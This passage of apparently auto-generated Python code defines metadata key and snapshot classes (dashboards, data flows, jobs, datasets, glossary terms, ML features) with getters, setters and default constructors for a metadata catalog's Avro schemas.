"""Setter: The name of the AD/LDAP user."""
self._inner_dict['username'] = value
class DashboardKeyClass(DictWrapper):
"""Key for a Dashboard"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.DashboardKey")
def __init__(self,
dashboardTool: str,
dashboardId: str,
):
super().__init__()
self.dashboardTool = dashboardTool
self.dashboardId = dashboardId
@classmethod
def construct_with_defaults(cls) -> "DashboardKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.dashboardTool = str()
self.dashboardId = str()
@property
def dashboardTool(self) -> str:
"""Getter: The name of the dashboard tool such as looker, redash etc."""
return self._inner_dict.get('dashboardTool') # type: ignore
@dashboardTool.setter
def dashboardTool(self, value: str) -> None:
"""Setter: The name of the dashboard tool such as looker, redash etc."""
self._inner_dict['dashboardTool'] = value
@property
def dashboardId(self) -> str:
"""Getter: Unique id for the dashboard. This id should be globally unique for a dashboarding tool even when there are multiple deployments of it. As an example, dashboard URL could be used here for Looker such as 'looker.linkedin.com/dashboards/1234'"""
return self._inner_dict.get('dashboardId') # type: ignore
@dashboardId.setter
def dashboardId(self, value: str) -> None:
"""Setter: Unique id for the dashboard. This id should be globally unique for a dashboarding tool even when there are multiple deployments of it. As an example, dashboard URL could be used here for Looker such as 'looker.linkedin.com/dashboards/1234'"""
self._inner_dict['dashboardId'] = value
class DataFlowKeyClass(DictWrapper):
"""Key for a Data Flow"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.DataFlowKey")
def __init__(self,
orchestrator: str,
flowId: str,
cluster: str,
):
super().__init__()
self.orchestrator = orchestrator
self.flowId = flowId
self.cluster = cluster
@classmethod
def construct_with_defaults(cls) -> "DataFlowKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.orchestrator = str()
self.flowId = str()
self.cluster = str()
@property
def orchestrator(self) -> str:
"""Getter: Workflow manager like azkaban, airflow which orchestrates the flow"""
return self._inner_dict.get('orchestrator') # type: ignore
@orchestrator.setter
def orchestrator(self, value: str) -> None:
"""Setter: Workflow manager like azkaban, airflow which orchestrates the flow"""
self._inner_dict['orchestrator'] = value
@property
def flowId(self) -> str:
"""Getter: Unique Identifier of the data flow"""
return self._inner_dict.get('flowId') # type: ignore
@flowId.setter
def flowId(self, value: str) -> None:
"""Setter: Unique Identifier of the data flow"""
self._inner_dict['flowId'] = value
@property
def cluster(self) -> str:
"""Getter: Cluster where the flow is executed"""
return self._inner_dict.get('cluster') # type: ignore
@cluster.setter
def cluster(self, value: str) -> None:
"""Setter: Cluster where the flow is executed"""
self._inner_dict['cluster'] = value
class DataJobKeyClass(DictWrapper):
"""Key for a Data Job"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.DataJobKey")
def __init__(self,
flow: str,
jobId: str,
):
super().__init__()
self.flow = flow
self.jobId = jobId
@classmethod
def construct_with_defaults(cls) -> "DataJobKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.flow = str()
self.jobId = str()
@property
def flow(self) -> str:
"""Getter: Standardized data processing flow urn representing the flow for the job"""
return self._inner_dict.get('flow') # type: ignore
@flow.setter
def flow(self, value: str) -> None:
"""Setter: Standardized data processing flow urn representing the flow for the job"""
self._inner_dict['flow'] = value
@property
def jobId(self) -> str:
"""Getter: Unique Identifier of the data job"""
return self._inner_dict.get('jobId') # type: ignore
@jobId.setter
def jobId(self, value: str) -> None:
"""Setter: Unique Identifier of the data job"""
self._inner_dict['jobId'] = value
class DataPlatformKeyClass(DictWrapper):
"""Key for a Data Platform"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.DataPlatformKey")
def __init__(self,
platformName: str,
):
super().__init__()
self.platformName = platformName
@classmethod
def construct_with_defaults(cls) -> "DataPlatformKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.platformName = str()
@property
def platformName(self) -> str:
"""Getter: Data platform name i.e. hdfs, oracle, espresso"""
return self._inner_dict.get('platformName') # type: ignore
@platformName.setter
def platformName(self, value: str) -> None:
"""Setter: Data platform name i.e. hdfs, oracle, espresso"""
self._inner_dict['platformName'] = value
class DataProcessKeyClass(DictWrapper):
"""Key for a Data Process"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.DataProcessKey")
def __init__(self,
name: str,
orchestrator: str,
origin: Union[str, "FabricTypeClass"],
):
super().__init__()
self.name = name
self.orchestrator = orchestrator
self.origin = origin
@classmethod
def construct_with_defaults(cls) -> "DataProcessKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.name = str()
self.orchestrator = str()
self.origin = FabricTypeClass.DEV
@property
def name(self) -> str:
"""Getter: Process name i.e. an ETL job name"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Process name i.e. an ETL job name"""
self._inner_dict['name'] = value
@property
def orchestrator(self) -> str:
"""Getter: Standardized Orchestrator where data process is defined.
TODO: Migrate towards something that can be validated like DataPlatform urn"""
return self._inner_dict.get('orchestrator') # type: ignore
@orchestrator.setter
def orchestrator(self, value: str) -> None:
"""Setter: Standardized Orchestrator where data process is defined.
TODO: Migrate towards something that can be validated like DataPlatform urn"""
self._inner_dict['orchestrator'] = value
@property
def origin(self) -> Union[str, "FabricTypeClass"]:
"""Getter: Fabric type where dataset belongs to or where it was generated."""
return self._inner_dict.get('origin') # type: ignore
@origin.setter
def origin(self, value: Union[str, "FabricTypeClass"]) -> None:
"""Setter: Fabric type where dataset belongs to or where it was generated."""
self._inner_dict['origin'] = value
class DatasetKeyClass(DictWrapper):
"""Key for a Dataset"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.DatasetKey")
def __init__(self,
platform: str,
name: str,
origin: Union[str, "FabricTypeClass"],
):
super().__init__()
self.platform = platform
self.name = name
self.origin = origin
@classmethod
def construct_with_defaults(cls) -> "DatasetKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.platform = str()
self.name = str()
self.origin = FabricTypeClass.DEV
@property
def platform(self) -> str:
"""Getter: Data platform urn associated with the dataset"""
return self._inner_dict.get('platform') # type: ignore
@platform.setter
def platform(self, value: str) -> None:
"""Setter: Data platform urn associated with the dataset"""
self._inner_dict['platform'] = value
@property
def name(self) -> str:
"""Getter: Dataset native name e.g. <db>.<table>, /dir/subdir/<name>, or <name>"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Dataset native name e.g. <db>.<table>, /dir/subdir/<name>, or <name>"""
self._inner_dict['name'] = value
@property
def origin(self) -> Union[str, "FabricTypeClass"]:
"""Getter: Fabric type where dataset belongs to or where it was generated."""
return self._inner_dict.get('origin') # type: ignore
@origin.setter
def origin(self, value: Union[str, "FabricTypeClass"]) -> None:
"""Setter: Fabric type where dataset belongs to or where it was generated."""
self._inner_dict['origin'] = value
class GlossaryNodeKeyClass(DictWrapper):
"""Key for a GlossaryNode"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.GlossaryNodeKey")
def __init__(self,
name: str,
):
super().__init__()
self.name = name
@classmethod
def construct_with_defaults(cls) -> "GlossaryNodeKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.name = str()
@property
def name(self) -> str:
# No docs available.
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
# No docs available.
self._inner_dict['name'] = value
class GlossaryTermKeyClass(DictWrapper):
"""Key for a GlossaryTerm"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.GlossaryTermKey")
def __init__(self,
name: str,
):
super().__init__()
self.name = name
@classmethod
def construct_with_defaults(cls) -> "GlossaryTermKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.name = str()
@property
def name(self) -> str:
# No docs available.
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
# No docs available.
self._inner_dict['name'] = value
class MLFeatureKeyClass(DictWrapper):
"""Key for an MLFeature"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.MLFeatureKey")
def __init__(self,
featureNamespace: str,
name: str,
):
super().__init__()
self.featureNamespace = featureNamespace
self.name = name
@classmethod
def construct_with_defaults(cls) -> "MLFeatureKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.featureNamespace = str()
self.name = str()
@property
def featureNamespace(self) -> str:
"""Getter: Namespace for the feature"""
return self._inner_dict.get('featureNamespace') # type: ignore
@featureNamespace.setter
def featureNamespace(self, value: str) -> None:
"""Setter: Namespace for the feature"""
self._inner_dict['featureNamespace'] = value
@property
def name(self) -> str:
"""Getter: Name of the feature"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Name of the feature"""
self._inner_dict['name'] = value
class MLFeatureTableKeyClass(DictWrapper):
"""Key for an MLFeatureTable"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.MLFeatureTableKey")
def __init__(self,
platform: str,
name: str,
):
super().__init__()
self.platform = platform
self.name = name
@classmethod
def construct_with_defaults(cls) -> "MLFeatureTableKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.platform = str()
self.name = str()
@property
def platform(self) -> str:
"""Getter: Data platform urn associated with the feature table"""
return self._inner_dict.get('platform') # type: ignore
@platform.setter
def platform(self, value: str) -> None:
"""Setter: Data platform urn associated with the feature table"""
self._inner_dict['platform'] = value
@property
def name(self) -> str:
"""Getter: Name of the feature table"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Name of the feature table"""
self._inner_dict['name'] = value
class MLModelKeyClass(DictWrapper):
"""Key for an ML model"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.MLModelKey")
def __init__(self,
platform: str,
name: str,
origin: Union[str, "FabricTypeClass"],
):
super().__init__()
self.platform = platform
self.name = name
self.origin = origin
@classmethod
def construct_with_defaults(cls) -> "MLModelKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.platform = str()
self.name = str()
self.origin = FabricTypeClass.DEV
@property
def platform(self) -> str:
"""Getter: Standardized platform urn for the model"""
return self._inner_dict.get('platform') # type: ignore
@platform.setter
def platform(self, value: str) -> None:
"""Setter: Standardized platform urn for the model"""
self._inner_dict['platform'] = value
@property
def name(self) -> str:
"""Getter: Name of the MLModel"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Name of the MLModel"""
self._inner_dict['name'] = value
@property
def origin(self) -> Union[str, "FabricTypeClass"]:
"""Getter: Fabric type where model belongs to or where it was generated"""
return self._inner_dict.get('origin') # type: ignore
@origin.setter
def origin(self, value: Union[str, "FabricTypeClass"]) -> None:
"""Setter: Fabric type where model belongs to or where it was generated"""
self._inner_dict['origin'] = value
class MLPrimaryKeyKeyClass(DictWrapper):
"""Key for an MLPrimaryKey"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.MLPrimaryKeyKey")
def __init__(self,
featureNamespace: str,
name: str,
):
super().__init__()
self.featureNamespace = featureNamespace
self.name = name
@classmethod
def construct_with_defaults(cls) -> "MLPrimaryKeyKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.featureNamespace = str()
self.name = str()
@property
def featureNamespace(self) -> str:
"""Getter: Namespace for the primary key"""
return self._inner_dict.get('featureNamespace') # type: ignore
@featureNamespace.setter
def featureNamespace(self, value: str) -> None:
"""Setter: Namespace for the primary key"""
self._inner_dict['featureNamespace'] = value
@property
def name(self) -> str:
"""Getter: Name of the primary key"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Name of the primary key"""
self._inner_dict['name'] = value
class TagKeyClass(DictWrapper):
"""Key for a Tag"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.TagKey")
def __init__(self,
name: str,
):
super().__init__()
self.name = name
@classmethod
def construct_with_defaults(cls) -> "TagKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.name = str()
@property
def name(self) -> str:
"""Getter: The unique tag name"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: The unique tag name"""
self._inner_dict['name'] = value
class ChartSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific Chart entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.ChartSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["ChartKeyClass", "ChartInfoClass", "ChartQueryClass", "EditableChartPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "ChartSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["ChartKeyClass", "ChartInfoClass", "ChartQueryClass", "EditableChartPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the chart. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["ChartKeyClass", "ChartInfoClass", "ChartQueryClass", "EditableChartPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the chart. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class CorpGroupSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific CorpGroup entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.CorpGroupSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["CorpGroupKeyClass", "CorpGroupInfoClass", "GlobalTagsClass", "StatusClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "CorpGroupSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["CorpGroupKeyClass", "CorpGroupInfoClass", "GlobalTagsClass", "StatusClass"]]:
"""Getter: The list of metadata aspects associated with the LdapUser. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["CorpGroupKeyClass", "CorpGroupInfoClass", "GlobalTagsClass", "StatusClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the LdapUser. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class CorpUserSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific CorpUser entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.CorpUserSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["CorpUserKeyClass", "CorpUserInfoClass", "CorpUserEditableInfoClass", "GlobalTagsClass", "StatusClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "CorpUserSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["CorpUserKeyClass", "CorpUserInfoClass", "CorpUserEditableInfoClass", "GlobalTagsClass", "StatusClass"]]:
"""Getter: The list of metadata aspects associated with the CorpUser. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["CorpUserKeyClass", "CorpUserInfoClass", "CorpUserEditableInfoClass", "GlobalTagsClass", "StatusClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the CorpUser. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class DashboardSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific Dashboard entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.DashboardSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["DashboardKeyClass", "DashboardInfoClass", "EditableDashboardPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "DashboardSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["DashboardKeyClass", "DashboardInfoClass", "EditableDashboardPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the dashboard. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["DashboardKeyClass", "DashboardInfoClass", "EditableDashboardPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the dashboard. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class DataFlowSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific DataFlow entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.DataFlowSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["DataFlowKeyClass", "DataFlowInfoClass", "EditableDataFlowPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "DataFlowSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["DataFlowKeyClass", "DataFlowInfoClass", "EditableDataFlowPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the data flow. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["DataFlowKeyClass", "DataFlowInfoClass", "EditableDataFlowPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the data flow. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class DataJobSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific DataJob entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.DataJobSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["DataJobKeyClass", "DataJobInfoClass", "DataJobInputOutputClass", "EditableDataJobPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "DataJobSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["DataJobKeyClass", "DataJobInfoClass", "DataJobInputOutputClass", "EditableDataJobPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the data job. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["DataJobKeyClass", "DataJobInfoClass", "DataJobInputOutputClass", "EditableDataJobPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the data job. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class DataPlatformSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific dataplatform entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.DataPlatformSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["DataPlatformKeyClass", "DataPlatformInfoClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "DataPlatformSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["DataPlatformKeyClass", "DataPlatformInfoClass"]]:
"""Getter: The list of metadata aspects associated with the data platform. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["DataPlatformKeyClass", "DataPlatformInfoClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the data platform. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class DataProcessSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific Data process entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.DataProcessSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["DataProcessKeyClass", "OwnershipClass", "DataProcessInfoClass", "StatusClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "DataProcessSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["DataProcessKeyClass", "OwnershipClass", "DataProcessInfoClass", "StatusClass"]]:
"""Getter: The list of metadata aspects associated with the data process. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["DataProcessKeyClass", "OwnershipClass", "DataProcessInfoClass", "StatusClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the data process. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class DatasetSnapshotClass(DictWrapper):
# No docs available.
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.DatasetSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["DatasetKeyClass", "DatasetPropertiesClass", "EditableDatasetPropertiesClass", "DatasetDeprecationClass", "DatasetUpstreamLineageClass", "UpstreamLineageClass", "InstitutionalMemoryClass", "OwnershipClass", "StatusClass", "SchemaMetadataClass", "EditableSchemaMetadataClass", "GlobalTagsClass", "GlossaryTermsClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "DatasetSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["DatasetKeyClass", "DatasetPropertiesClass", "EditableDatasetPropertiesClass", "DatasetDeprecationClass", "DatasetUpstreamLineageClass", "UpstreamLineageClass", "InstitutionalMemoryClass", "OwnershipClass", "StatusClass", "SchemaMetadataClass", "EditableSchemaMetadataClass", "GlobalTagsClass", "GlossaryTermsClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the dataset. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["DatasetKeyClass", "DatasetPropertiesClass", "EditableDatasetPropertiesClass", "DatasetDeprecationClass", "DatasetUpstreamLineageClass", "UpstreamLineageClass", "InstitutionalMemoryClass", "OwnershipClass", "StatusClass", "SchemaMetadataClass", "EditableSchemaMetadataClass", "GlobalTagsClass", "GlossaryTermsClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the dataset. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class GlossaryNodeSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific GlossaryNode entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.GlossaryNodeSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["GlossaryNodeKeyClass", "GlossaryNodeInfoClass", "OwnershipClass", "StatusClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "GlossaryNodeSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["GlossaryNodeKeyClass", "GlossaryNodeInfoClass", "OwnershipClass", "StatusClass"]]:
"""Getter: The list of metadata aspects associated with the GlossaryNode. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["GlossaryNodeKeyClass", "GlossaryNodeInfoClass", "OwnershipClass", "StatusClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the GlossaryNode. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class GlossaryTermSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific GlossaryTerm entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.GlossaryTermSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["GlossaryTermKeyClass", "GlossaryTermInfoClass", "OwnershipClass", "StatusClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "GlossaryTermSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["GlossaryTermKeyClass", "GlossaryTermInfoClass", "OwnershipClass", "StatusClass"]]:
"""Getter: The list of metadata aspects associated with the GlossaryTerm. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["GlossaryTermKeyClass", "GlossaryTermInfoClass", "OwnershipClass", "StatusClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the GlossaryTerm. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class MLFeatureSnapshotClass(DictWrapper):
# No docs available.
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.MLFeatureSnapshot")
def __init__(self,
urn: str,
